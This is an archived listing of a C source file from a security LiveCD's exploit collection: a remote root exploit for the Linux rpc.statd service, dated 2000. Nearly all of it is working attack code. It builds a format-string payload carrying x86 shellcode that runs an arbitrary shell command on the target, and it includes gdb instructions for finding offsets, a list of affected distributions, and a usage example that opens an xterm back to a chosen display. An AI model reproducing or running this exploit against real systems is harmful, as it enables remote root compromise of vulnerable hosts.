Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / rpc-statd.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 8KB | 259 lines

/* * rpc.statd remote root xploit for linux/x86 * based on the xploit made by drow for linux/PowerPC * * Author: Doing, 08/2000 * * NOTE: * The guest of the remote address of the saved EIP and local vars * is still a problem. The value showed on the usage worked * fine on mi suse with the compiled sources. With gdb and a little * patience you should get the address for your distro/version. * Some address doesn't work, because they cause a very long result, * and the syslog() function overflows itself when parsing the * format input :( * * Greetz to Pascal Bouchareine for that great paper on format bugs :) * * Y saludos a los canales #phreak y #hacker_novatos del IRC hispano :P * * Excuse my poor english :-) * * Affected: * Connectiva Linux 5.1 * Connectiva Linux 5.0 * Connectiva Linux 4.2 * Connectiva Linux 4.1 * Connectiva Linux 4.0es * Connectiva Linux 4.0 * Debian Linux 2.3 * Debian Linux 2.2 * RedHat Linux 6.2 i386 * RedHat Linux 6.1 i386 * RedHat Linux 6.0 i386 * Trustix Secure Linux 1.1 * Trustix Secure Linux 1.0 * * To compile the xploit you need the librpcsvc library: * * gcc statd.c -o statd -lrpcsvc * * Way of finding offsets for your distro/version: * * Launch statd and attach it with gdb: * * [root@localhost statd]# ./statd * [root@localhost statd]# ps aux | grep st * root 394 0.0 0.9 1184 576 ? S 15:27 0:00 ./statd * [root@localhost statd]# gdb ./statd * GNU gdb 4.18 * [ cut cut cut cut ] * (gdb) attach 394 * Attaching to program: * /zecreto/doing/xploits/daemon/rpc.statd/knfsd-1.3.2/utils/statd/./statd, * process 394 * * [ Now put a breakpoint on the function log() ] * (gdb) break log * Breakpoint 1 at 0x804a10a: file log.c, line 82. * (gdb) c * Continuing. * * [ At this point run the xploit ] * Breakpoint 1, log (level=2, fmt=0x804c820 "SM_MON request for hostname * containing '/': %s") at log.c:82 * 82 va_start(ap, fmt); * * [ And put another breakpoint in the function syslog() ] * (gdb) break syslog * Breakpoint 2 at 0x400d12e6: file syslog.c, line 102. * (gdb) c * Continuing. * * Breakpoint 2, syslog (pri=2, * fmt=0xbfffef38 "SM_MON request for hostname containing '/': * [garbage]..) * ^^^^^^^^^ * This is the address of the buffer in function log. If you run * the xploit * with this value it should work. * * Doing * * */ #include <sys/types.h> #include <sys/time.h> #include <stdio.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #include <rpcsvc/sm_inter.h> #include <sys/socket.h> void usage(char *s) { printf("rpc.statd xploit for linux/x86 - Doing <jdoing@bigfoot.com>\n"); printf("Usage: %s host address command\n", s); printf("host\t: the targe host\n"); printf("address\t: the address of the buffer in function log()\n"); printf("command\t: command to run remotely\n\n"); printf("ej:%s 127.0.0.1 0xbffff3d4 \"/usr/X11R6/bin/xterm -ut -display 127.0.0.1:0\"\n\n", s); printf("Enjoy!\n"); exit(0); } /* shellcode without cr/lf and control caracters */ char *code = "\xeb\x4b\x5e\x89\x76\xac\x83\xee\x20\x8d\x5e\x28\x83\xc6\x20\x89" "\x5e\xb0\x83\xee\x20\x8d\x5e\x2e\x83\xc6\x20\x83\xc3\x20\x83\xeb" "\x23\x89\x5e\xb4\x31\xc0\x83\xee\x20\x88\x46\x27\x88\x46\x2a\x83" "\xc6\x20\x88\x46\xab\x89\x46\xb8\xb0\x2b\x2c\x20\x89\xf3\x8d\x4e" "\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xb0\xff" "\xff\xff/bin/sh -c "; char shellcode[4096]; void make_shellcode(char *cdir, char *cmd) { unsigned long dir, ret; int c, eat = 14; int first_n = 0xc9; char tmp[1024]; int i, i0, i1, i2; char *ptr = shellcode; memset(shellcode, 0, 4096); sscanf(cdir, "%x", &dir); ret = dir + 0xd0 - 20; /* put ret address into nop-space :) */ dir += 1028; /* dir = address of saved EIP = address of buffer + 1024 bytes of buffer + 4 bytes of SFP */ ptr = &shellcode[strlen(shellcode)]; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; dir++; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; dir++; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; dir++; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; sprintf(ptr, "%c%c%c%c", dir & 0xff, (dir & 0xff00) >> 8, (dir & 0xff0000) >> 16, (dir & 0xff000000) >> 24); ptr = &shellcode[strlen(shellcode)]; for ( c = 0; c < eat; c++) { sprintf(ptr, "%%x "); ptr = &shellcode[strlen(shellcode)]; } i0 = (ret & 0xff); if (i0 > first_n) sprintf(ptr, "%%0%ix%%n", i0 - first_n); if (i0 == first_n) sprintf(ptr, "%%n"); if (i0 < first_n) { i0 |= 0x0100; sprintf(ptr, "%%0%ix%%n", i0 - first_n); } ptr = &shellcode[strlen(shellcode)]; i = (ret & 0xff00) >> 8; if (i > i0) sprintf(ptr, "%%0%ix%%n", i - i0); if (i == i0) sprintf(ptr, "%%n"); if (i < i0) { i |= 0x0100; sprintf(ptr, "%%0%ix%%n", i - i0); } ptr = &shellcode[strlen(shellcode)]; i1 = (ret & 0xff0000) >> 16; if (i1 > i) sprintf(ptr, "%%0%ix%%n", i1 - i); if (i1 == i) sprintf(ptr, "%%n"); if (i1 < i) { i1 |= 0x0100; sprintf(ptr, "%%0%ix%%n", i1 - i); } ptr = &shellcode[strlen(shellcode)]; i2 = (ret & 0xff000000) >> 24; i2 |= 0x0200; sprintf(ptr, "%%0%ix%%n", i2 - i1); ptr = &shellcode[strlen(shellcode)]; for (c = 0; c < 50; c++) { sprintf(ptr, "\x90"); ptr = &shellcode[strlen(shellcode)]; } sprintf(ptr, "%s%s\x00", code, cmd); } main(int argc, char *argv[]) { CLIENT *cl; enum clnt_stat stat; struct timeval tm; struct mon monreq; struct sm_stat_res monres; struct hostent *hp; struct sockaddr_in target; int sd, i; if (argc < 4) usage(argv[0]); make_shellcode(argv[2], argv[3]); memset(&monreq, 0, sizeof(monreq)); monreq.mon_id.my_id.my_name ="localhost"; monreq.mon_id.my_id.my_prog = 0; monreq.mon_id.my_id.my_vers = 0; monreq.mon_id.my_id.my_proc = 0; monreq.mon_id.mon_name = shellcode; if ((hp=gethostbyname(argv[1])) == NULL) { printf("Can't resolve %s\n", argv[1]); exit(0); } target.sin_family=AF_INET; target.sin_addr.s_addr=*(u_long *)hp->h_addr; target.sin_port=0; /* ask portmap */ sd = RPC_ANYSOCK; tm.tv_sec=10; tm.tv_usec=0; if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) { clnt_pcreateerror("clnt_create"); exit(0); } stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res, (char *)&monres, tm); if (stat != RPC_SUCCESS) clnt_perror(cl, "clnt_call"); else printf("stat_res = %d.\n", monres.res_stat); clnt_destroy(cl); } /* www.hack.co.za [2 August 2000]*/